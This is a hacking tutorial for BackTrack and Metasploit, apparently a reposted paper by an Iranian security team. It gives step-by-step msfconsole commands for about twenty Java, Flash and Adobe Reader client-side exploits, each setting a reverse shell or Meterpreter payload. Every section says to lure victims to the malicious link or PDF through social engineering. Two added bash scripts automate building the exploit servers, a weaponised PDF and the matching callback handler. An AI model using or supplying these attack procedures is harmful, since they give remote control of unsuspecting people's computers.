Uploaded by pdfbacktrack, posted on 29-Nov-2015

Back Track Tutorials

How to Attack on Remote PC With Applications Vulnerabilities

By: Red H4t V!per

© All Rights Reserved For IrIsT Security Team

Contact:

[email protected]

[email protected]

© Copyright: All Rights Reserved For IrIsT Security Team - Behnam Abbasi

Vanda

Special Thanks To: Am!r, C0dex, B3HZ4D, TaK.FaNaR, 0x0ptim0us, Mr.XHat, Skote_Vahshat, (^_^)

Greetz To: IrIsT, TBH, 3xp1r3, KurdHackTeam

Introduction:

This paper shows how to exploit client-side application vulnerabilities and gain access to a remote PC using Metasploit on BackTrack. Every attack below follows the same pattern: a Metasploit browser or file-format module generates the malicious content, the victim is lured into opening it, and a reverse payload connects back to the attacker's machine.

It is assumed that you are already familiar with the Linux operating system and with Metasploit, so we go straight to the attacks.

Thanks to all readers of this article.

Attacking a Remote Windows PC using the Java Signed Applet Method:

This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop up a dialog asking whether they trust the signed applet. On older versions the dialog displays the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it is not signed by a trusted CA). The SigningCert option allows you to provide a trusted code-signing certificate, whose values override CERTCN. If SigningCert is not given, a randomly generated self-signed certificate is used. Either way, once the user clicks "Run", the applet executes with full user permissions. Note that this method does not depend on any Java bug: it works against a fully patched JRE, because it is the user accepting the prompt, not a vulnerability, that grants the applet its permissions.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_signed_applet

Type "show options" to see the module settings, then set them:

msf exploit(java_signed_applet) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_signed_applet) > set appletname adobe (the main applet's class name)
msf exploit(java_signed_applet) > set certcn adobe player (the name shown in the certificate dialog)
msf exploit(java_signed_applet) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_signed_applet) > set srvport 80 (the local port to listen on; default: 8080)
msf exploit(java_signed_applet) > set uripath adobeclipes (the URL path to use for this exploit)
msf exploit(java_signed_applet) > set lport 4443
msf exploit(java_signed_applet) > exploit

The reverse payload also has to know where to connect back: LHOST must be the attacker's address, and the following sections set it explicitly with the same value as SRVHOST.

The URL to give to the victim is http://192.168.42.131/adobeclipes (no port in the URL because SRVPORT is 80).

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser and accepts the applet prompt, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.
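Every browser section on this page repeats the same steps: load the module, set the server and payload options, run it, hand out the URL, pick the session. The script below is an added example, not part of the original tutorial and not Metasploit's own code: it generates a msfconsole resource file for the signed-applet procedure above, after checking the two things this page keeps pointing out (SRVHOST must be an address on the attacking machine, and a port below 1024 such as 80 needs root), and it prints the exact URL to hand to the victim. The option names (PAYLOAD, SRVHOST, SRVPORT, URIPATH, LHOST, LPORT, APPLETNAME, CERTCN, ExitOnSession) and the `msfconsole -r` flag are Metasploit's; the `local_ipv4s` helper assumes the iproute2 `ip` command is installed; the address 192.168.42.131, port 4443 and path adobeclipes are the tutorial's lab values.

```bash
#!/usr/bin/env bash
# Added example (not from the original tutorial or from Metasploit): turn the
# java_signed_applet procedure above into a generated resource script, with the
# SRVHOST check the page keeps repeating. Assumes Metasploit's option names and,
# for local_ipv4s, the iproute2 `ip` command; lab values are the tutorial's.

# local_ipv4s -> IPv4 addresses configured on this host, one per line.
local_ipv4s() {
    ip -o -4 addr show 2>/dev/null | awk '{ print $4 }' | cut -d/ -f1
}

# srvhost_is_local HOST ADDR_LIST -> success if HOST is in ADDR_LIST (one per line)
# or is 0.0.0.0, which Metasploit accepts as "listen on every interface".
srvhost_is_local() {
    local host=$1 addrs=$2
    [ "$host" = "0.0.0.0" ] && return 0
    printf '%s\n' "$addrs" | grep -Fqx -- "$host"
}

# victim_url HOST PORT URIPATH -> the link to send; :80 is omitted, a leading / is not doubled.
victim_url() {
    local path=${3#/}
    if [ "$2" = "80" ]; then
        printf 'http://%s/%s\n' "$1" "$path"
    else
        printf 'http://%s:%s/%s\n' "$1" "$2" "$path"
    fi
}

# browser_rc MODULE PAYLOAD SRVHOST SRVPORT URIPATH LHOST LPORT [EXTRA_SET_LINES]
# -> resource script text. The server is started as a job (-j -z) so the console
# stays free for "sessions -l"; ExitOnSession false keeps serving after the first hit.
browser_rc() {
    printf 'use %s\nset PAYLOAD %s\nset SRVHOST %s\nset SRVPORT %s\nset URIPATH %s\n' \
        "$1" "$2" "$3" "$4" "$5"
    printf 'set LHOST %s\nset LPORT %s\n' "$6" "$7"
    [ -n "${8:-}" ] && printf '%s\n' "$8"
    printf 'set ExitOnSession false\nexploit -j -z\n'
}

# main [SRVHOST] [ADDR_LIST] -> writes the signed-applet resource script to stdout.
# ADDR_LIST overrides the detected addresses (for tests, or hosts without `ip`).
main() {
    local srvhost=${1:-192.168.42.131} addrs=${2:-$(local_ipv4s)}
    local srvport=80 uripath=adobeclipes lport=4443
    if [ -z "$addrs" ]; then
        echo "warning: could not enumerate local addresses, SRVHOST $srvhost not checked" >&2
    elif ! srvhost_is_local "$srvhost" "$addrs"; then
        echo "error: SRVHOST $srvhost is not an address on this machine" >&2
        return 1
    fi
    if [ "$srvport" -lt 1024 ] && [ "$(id -u)" -ne 0 ]; then
        echo "warning: SRVPORT $srvport needs root to bind" >&2
    fi
    # '#' lines are comments in a resource file, so the URL travels with the script.
    printf '# victim URL: %s\n' "$(victim_url "$srvhost" "$srvport" "$uripath")"
    browser_rc exploit/multi/browser/java_signed_applet windows/meterpreter/reverse_tcp \
        "$srvhost" "$srvport" "$uripath" "$srvhost" "$lport" \
        "$(printf 'set APPLETNAME adobe\nset CERTCN adobe player')"
}

main "$@"
```

Run it as `bash signed_applet_rc.sh > signed_applet.rc`, then `msfconsole -q -r signed_applet.rc`. Because the module is started with `exploit -j -z`, the console prompt stays available for `sessions -l` and `sessions -i <number>` while the page is being served, and `ExitOnSession false` means a second victim opening the same link also gets a session instead of hitting a server that already shut down.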

Attacking a Remote Windows PC using Sun Java Command Line Injection:

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser-known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB: the alternative JVM library is loaded from a UNC path, which Windows resolves over SMB first and then over WebDAV on port 80, so the attacker's box must answer on port 80 and must not answer on SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/windows/browser/java_ws_vmargs

msf exploit(java_ws_vmargs) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_ws_vmargs) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_ws_vmargs) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_ws_vmargs) > set srvport 80
msf exploit(java_ws_vmargs) > set uripath / (the URL path to use for this exploit)
msf exploit(java_ws_vmargs) > exploit

The URL to give to the victim is http://192.168.42.131/

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using the Java AtomicReferenceArray Type Violation Vulnerability:

This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox and load additional classes in order to perform malicious operations.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_atomicreferencearray

msf exploit(java_atomicreferencearray) > set payload generic/shell_reverse_tcp
msf exploit(java_atomicreferencearray) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_atomicreferencearray) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_atomicreferencearray) > set uripath yes (the URL path to use for this exploit)
msf exploit(java_atomicreferencearray) > exploit

The URL to give to the victim is http://192.168.42.131:8080/yes (SRVPORT was left at its default of 8080).

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using the Java Trusted Chain Method:

This module exploits a vulnerability in the Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_trusted_chain

msf exploit(java_trusted_chain) > set payload java/meterpreter/reverse_tcp
msf exploit(java_trusted_chain) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_trusted_chain) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_trusted_chain) > set uripath jta (the URL path to use for this exploit)
msf exploit(java_trusted_chain) > exploit

The URL to give to the victim is http://192.168.42.131:8080/jta

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using the Java RMIConnectionImpl Deserialization Privilege Escalation Exploit:

This module exploits a vulnerability in the Java Runtime Environment that allows deserializing a MarshalledObject containing a custom class loader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_rmi_connection_impl

msf exploit(java_rmi_connection_impl) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_rmi_connection_impl) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_rmi_connection_impl) > set uripath bip (the URL path to use for this exploit)
msf exploit(java_rmi_connection_impl) > exploit

No payload is set here, so the module's default payload is used; set one explicitly, as in the other sections, if you want a particular shell type.

The URL to give to the victim is http://192.168.42.131:8080/bip

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using the Sun Java Runtime Buffer Overflow:

This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a "launchjnlp" parameter, it will copy the contents of the "docbase" parameter to a stack buffer using the "sprintf" function. A string of 396 bytes is enough to overflow the 256-byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: the string being copied is first passed through "WideCharToMultiByte". Due to this, only characters which have a valid localized multibyte representation are allowed; invalid characters are replaced with question marks ('?'), which restricts the byte values the overflow string and payload may contain.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/windows/browser/java_docbase_bof

msf exploit(java_docbase_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_docbase_bof) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_docbase_bof) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_docbase_bof) > set uripath jab (the URL path to use for this exploit)
msf exploit(java_docbase_bof) > exploit

The URL to give to the victim is http://192.168.42.131:8080/jab

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using Sun Java Applet2ClassLoader Remote Code Execution:

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java sandbox. When an applet is invoked with (1) a "codebase" parameter that points at a trusted directory and (2) a "code" parameter that is a URL that does not contain any dots, the applet will run outside of the sandbox. This vulnerability affects JRE prior to version 6 update 24.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/windows/browser/java_codebase_trust

msf exploit(java_codebase_trust) > set payload java/meterpreter/reverse_tcp
msf exploit(java_codebase_trust) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_codebase_trust) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_codebase_trust) > set uripath jt (the URL path to use for this exploit)
msf exploit(java_codebase_trust) > exploit

The URL to give to the victim is http://192.168.42.131:8080/jt

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using Sun Java Web Start Execution:

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to escape the Java sandbox. By injecting a parameter into a Java call within the BasicServiceImpl class, the default Java sandbox policy file can be overwritten. The vulnerability affects version 6 prior to update 22. NOTE: exploiting this vulnerability causes several sinister-looking popup windows saying that Java is "Downloading application."

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/windows/browser/java_basicservice_impl

msf exploit(java_basicservice_impl) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_basicservice_impl) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_basicservice_impl) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_basicservice_impl) > set uripath jbs (the URL path to use for this exploit)
msf exploit(java_basicservice_impl) > exploit

The URL to give to the victim is http://192.168.42.131:8080/jbs

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using the Java Applet Rhino Script Engine:

This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example IE, Firefox, Google Chrome, etc.).

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_rhino

msf exploit(java_rhino) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_rhino) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_rhino) > set target 1 (the victim's operating system; "show targets" lists the choices)
msf exploit(java_rhino) > set uripath jr (the URL path to use for this exploit)
msf exploit(java_rhino) > exploit

No payload is set here, so the module's default payload for the chosen target is used.

The URL to give to the victim is http://192.168.42.131:8080/jr

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using the Java MixerSequencer Object GM_Song Structure Handling Vulnerability:

This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation is done by supplying a specially crafted MIDI file within an RMF file. When the MixerSequencer object is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A MIDI block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When the vulnerability is triggered, "ebx" points to a fake event in the MIDI file which stores the shellcode. A "jmp ebx" from msvcr71.dll is used to make the exploit reliable across Java updates.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/windows/browser/java_mixer_sequencer

msf exploit(java_mixer_sequencer) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_mixer_sequencer) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_mixer_sequencer) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_mixer_sequencer) > set uripath jm (the URL path to use for this exploit)
msf exploit(java_mixer_sequencer) > exploit

The URL to give to the victim is http://192.168.42.131:8080/jm

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using Sun Java Calendar Deserialization Privilege Escalation:

This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload, which is generated as an executable and dropped/executed on the target, or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, and SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_calendar_deserialize

msf exploit(java_calendar_deserialize) > set payload java/meterpreter/reverse_tcp
msf exploit(java_calendar_deserialize) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_calendar_deserialize) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_calendar_deserialize) > set uripath jc (the URL path to use for this exploit)
msf exploit(java_calendar_deserialize) > exploit

The URL to give to the victim is http://192.168.42.131:8080/jc

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using the Sun Java JRE getSoundbank Buffer Overflow:

This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_getsoundbank_bof

msf exploit(java_getsoundbank_bof) > set payload generic/shell_reverse_tcp
msf exploit(java_getsoundbank_bof) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_getsoundbank_bof) > set uripath js (the URL path to use for this exploit)
msf exploit(java_getsoundbank_bof) > exploit

SRVHOST is not set here, so the module listens on its default of 0.0.0.0 (every interface); the link still has to use an address the victim can reach.

The URL to give to the victim is http://192.168.42.131:8080/js

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using the Sun Java JRE AWT setDiffICM Buffer Overflow:

This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_setdifficm_bof

msf exploit(java_setdifficm_bof) > set payload generic/shell_reverse_tcp
msf exploit(java_setdifficm_bof) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_setdifficm_bof) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_setdifficm_bof) > set uripath rb (the URL path to use for this exploit)
msf exploit(java_setdifficm_bof) > exploit

The URL to give to the victim is http://192.168.42.131:8080/rb

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using Sun Java Web Start Plugin Command Line Argument Injection:

This module exploits a flaw in the Web Start Plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser-known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 "are believed to be affected by this vulnerability." In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/windows/browser/java_ws_arginject_altjvm

msf exploit(java_ws_arginject_altjvm) > set payload windows/meterpreter/reverse_tcp
msf exploit(java_ws_arginject_altjvm) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_ws_arginject_altjvm) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_ws_arginject_altjvm) > exploit

No SRVPORT or URIPATH is set: this module serves on port 80 at / so that the WebDAV fetch works, which is also why it needs root and why the URL below has no port suffix.

The URL to give to the victim is http://192.168.42.131/

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using Java Applet JAX-WS Remote Code Execution:

This module abuses the JAX-WS classes from a Java applet to run arbitrary Java code outside of the sandbox, as exploited in the wild in November 2012. The vulnerability affects Java version 7u7 and earlier.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_jre17_jaxws

msf exploit(java_jre17_jaxws) > set payload java/shell_reverse_tcp
msf exploit(java_jre17_jaxws) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_jre17_jaxws) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_jre17_jaxws) > set uripath / (the URL path to use for this exploit)
msf exploit(java_jre17_jaxws) > exploit

The URL to give to the victim is http://192.168.42.131:8080/

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using Java 7 Applet Remote Code Execution:

The exploit takes advantage of two issues in JDK 7: ClassFinder and MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a replacement for Class.forName() from JDK 6. It allows untrusted code to obtain a reference to, and access, a restricted package in JDK 7, which can be used to abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit we can invoke getField() by abusing findMethod() in Statement.invokeInternal() (but getField() must be public, and that is not always the case in JDK 6) in order to access Statement.acc's private field, modify the AccessControlContext, and then disable the SecurityManager. Once the SecurityManager is disabled, we can execute arbitrary Java code. The exploit has been tested successfully against multiple platforms, including IE, Firefox, Safari and Chrome on Windows, Ubuntu, OS X, Solaris, etc.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_jre17_exec

msf exploit(java_jre17_exec) > set payload java/shell_reverse_tcp
msf exploit(java_jre17_exec) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_jre17_exec) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_jre17_exec) > set uripath / (the URL path to use for this exploit)
msf exploit(java_jre17_exec) > exploit

The URL to give to the victim is http://192.168.42.131:8080/

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using Java Applet Field Bytecode Verifier Cache Remote Code Execution:

This module exploits a vulnerability in the HotSpot bytecode verifier where an invalid optimization of the GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox and load additional classes in order to perform malicious operations.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/multi/browser/java_verifier_field_access

msf exploit(java_verifier_field_access) > set payload java/shell_reverse_tcp
msf exploit(java_verifier_field_access) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(java_verifier_field_access) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(java_verifier_field_access) > set uripath / (the URL path to use for this exploit)
msf exploit(java_verifier_field_access) > exploit

The URL to give to the victim is http://192.168.42.131:8080/

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.


Attacking a Remote Windows PC using Adobe Flash Player 11.3 Font Parsing Code Execution:

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt font file used by the SWF, it is possible to gain arbitrary remote code execution in the context of the user, as exploited in the wild.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/windows/browser/adobe_flash_otf_font

msf exploit(adobe_flash_otf_font) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_otf_font) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_flash_otf_font) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(adobe_flash_otf_font) > set uripath fpu (the URL path to use for this exploit)
msf exploit(adobe_flash_otf_font) > exploit

The URL to give to the victim is http://192.168.42.131:8080/fpu

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using Adobe Flash Player Object Type Confusion:

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 "_error" response, it is possible to gain arbitrary remote code execution in the context of the user. This vulnerability has been exploited in the wild as part of the "World Uyghur Congress Invitation.doc" e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/windows/browser/adobe_flash_rtmp

msf exploit(adobe_flash_rtmp) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_rtmp) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_flash_rtmp) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(adobe_flash_rtmp) > set uripath / (the URL path to use for this exploit)
msf exploit(adobe_flash_rtmp) > exploit

The URL to give to the victim is http://192.168.42.131:8080/

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.

Attacking a Remote Windows PC using the Adobe util.printf() Buffer Overflow:

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted PDF that contains a malformed util.printf() entry, an attacker may be able to execute arbitrary code. Unlike the browser modules above, this is a file-format module: it does not start a web server but writes a document to disk, so the reverse connection has to be caught by a separate handler.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/windows/fileformat/adobe_utilprintf

msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_utilprintf) > set filename book.pdf
msf exploit(adobe_utilprintf) > exploit

After the malicious PDF has been generated, it is stored on your local computer at /root/.msf4/local/book.pdf.

Now set up a listener to handle the reverse connection the victim's machine will make when the exploit succeeds. It must use the same payload and LHOST (and LPORT, left at its default of 4444 in both places here) as the PDF was built with:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit

With the handler running, send book.pdf to the victim. As soon as they download and open it, you get a Meterpreter shell on the victim's computer. Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.
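The file-format procedure above has a failure mode the browser sections do not: the PDF and the handler are configured in two separate places, and if PAYLOAD, LHOST or LPORT differ between them the victim connects to a port where nothing is listening and no session ever appears. The script below is an added example, not part of the original tutorial and not Metasploit's own code: it generates both resource files from one set of variables and checks that they agree before writing them. The option names (PAYLOAD, LHOST, LPORT, FILENAME, ExitOnSession), the ~/.msf4/local/ output directory and `msfconsole -r` are Metasploit's; 192.168.42.131, book.pdf and port 4444 (Metasploit's LPORT default) are the tutorial's values; the output directory defaults to $TMPDIR or /tmp and is an assumption of this script.

```bash
#!/usr/bin/env bash
# Added example (not from the original tutorial or from Metasploit): script the
# file-format workflow above. The malicious PDF comes from a fileformat module and a
# separate multi/handler must wait for the callback with exactly the same PAYLOAD,
# LHOST and LPORT. Option names are Metasploit's; lab values are the tutorial's.

# fileformat_rc MODULE PAYLOAD LHOST LPORT FILENAME -> resource script that builds the
# document. Fileformat modules have no SRVHOST/URIPATH: they write FILENAME under
# ~/.msf4/local/ and return to the prompt.
fileformat_rc() {
    printf 'use %s\nset PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset FILENAME %s\nexploit\n' \
        "$1" "$2" "$3" "$4" "$5"
}

# handler_rc PAYLOAD LHOST LPORT -> resource script for the listener. It runs as a job
# (-j -z) so the console stays usable, and ExitOnSession false keeps it listening so
# several victims opening the same PDF each get their own session.
handler_rc() {
    printf 'use exploit/multi/handler\nset PAYLOAD %s\nset LHOST %s\nset LPORT %s\n' "$1" "$2" "$3"
    printf 'set ExitOnSession false\nexploit -j -z\n'
}

# rc_option RC_TEXT NAME -> value of the last "set NAME value" line (NAME case-insensitive),
# empty if the option is never set.
rc_option() {
    printf '%s\n' "$1" | awk -v name="$2" '
        tolower($1) == "set" && tolower($2) == tolower(name) { val = $3 }
        END { print val }'
}

# handler_matches EXPLOIT_RC HANDLER_RC -> success only if PAYLOAD, LHOST and LPORT agree.
handler_matches() {
    local opt
    for opt in PAYLOAD LHOST LPORT; do
        [ "$(rc_option "$1" "$opt")" = "$(rc_option "$2" "$opt")" ] || return 1
    done
    return 0
}

# output_path FILENAME [HOME_DIR] -> where msfconsole leaves the generated file.
output_path() {
    printf '%s/.msf4/local/%s\n' "${2:-$HOME}" "$1"
}

# main [OUTDIR] -> writes utilprintf.rc and handler.rc into OUTDIR (default: $TMPDIR or /tmp)
# and prints the two msfconsole commands to run, in order.
main() {
    local outdir=${1:-${TMPDIR:-/tmp}}
    local payload=windows/meterpreter/reverse_tcp lhost=192.168.42.131 lport=4444 file=book.pdf
    local exploit_rc listener_rc
    exploit_rc=$(fileformat_rc exploit/windows/fileformat/adobe_utilprintf "$payload" "$lhost" "$lport" "$file")
    listener_rc=$(handler_rc "$payload" "$lhost" "$lport")
    if ! handler_matches "$exploit_rc" "$listener_rc"; then
        echo "error: handler and exploit disagree on PAYLOAD/LHOST/LPORT" >&2
        return 1
    fi
    printf '%s\n' "$exploit_rc" > "$outdir/utilprintf.rc"
    printf '%s\n' "$listener_rc" > "$outdir/handler.rc"
    echo "1. msfconsole -q -r $outdir/utilprintf.rc   (writes $(output_path "$file"))"
    echo "2. msfconsole -q -r $outdir/handler.rc      (then send $file to the victim)"
}

main "$@"
```

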